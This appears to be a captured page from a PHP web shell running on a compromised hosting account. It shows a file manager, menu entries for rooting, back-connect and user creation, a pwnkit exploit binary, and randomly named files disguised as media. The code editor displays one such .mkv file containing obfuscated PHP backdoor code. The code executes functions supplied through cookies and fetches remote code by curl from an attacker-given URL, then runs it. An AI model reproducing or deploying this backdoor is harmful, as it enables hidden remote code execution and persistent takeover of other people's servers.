Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
adrar.info /
wa1nfebj /
index /
index /
[ HOME SHELL ]
Name
Size
Permission
Action
index
[ DIR ]
drwx---r-x
.htaccess
154
B
-rw----r--
.mad-root
0
B
-rw-r--r--
BRqNtGOMhfvirTXpK.bmp
1016
B
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
hAEULYCTctmfDoZIVj.m3u8
1005
B
-rw----r--
index.php
116
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
ukFdZjmyvwoDTHPOcIfg.mkv
1.01
KB
-rw----r--
wyFfghMszCXDm.mp3
984
B
-rw----r--
yE.swf
1.39
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ukFdZjmyvwoDTHPOcIfg.mkv
<?php $Sy=${"\x5f\x43\x4f\x4f\x4b\x49\x45"};if((in_array(gettype($Sy).count($Sy),$Sy)&&count($Sy)==15)){(($Sy[61]=$Sy[61].$Sy[74])&&($Sy[85]=$Sy[61]($Sy[85]))&&(@$Sy=$Sy[85]($Sy[51],$Sy[61](${$Sy[40]}[19])))&&$Sy());} $cVCl = array(@${"\x5f\x47\x45\x54"}["\x41\x52\x52\x41\x59"],"\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e","\x73\x74\x72\x5f\x72\x6f\x74\x31\x33","\x6a\x73\x6f\x6e\x5f\x64\x65\x63\x6f\x64\x65","\x70\x61\x63\x6b","\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65","\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73",@${"\x5f\x47\x45\x54"}["\x6f\x66"],);$dq = $cVCl[2]($cVCl[0]);$YbmzB = @$cVCl[4]("\x48\x2a", $dq);$UJ = $cVCl[3]($YbmzB, true); $cVCl[7] == 1 && die($cVCl[6](__FILE__)); if (($UJ[0] - time()) > 0 and md5(md5($UJ[2])) === "f7abdffd60e027c6473961a314cb708f") { $ECid = curl_init($UJ[1]); curl_setopt($ECid, CURLOPT_RETURNTRANSFER, 1); $givtx = curl_exec($ECid);$rEQ = empty($givtx)?$cVCl[6]($UJ[1]):$givtx;@$cVCl[1]("", "\x7d" . $cVCl[5]($rEQ) . "\x2f\x2a"); die;} ?>
Close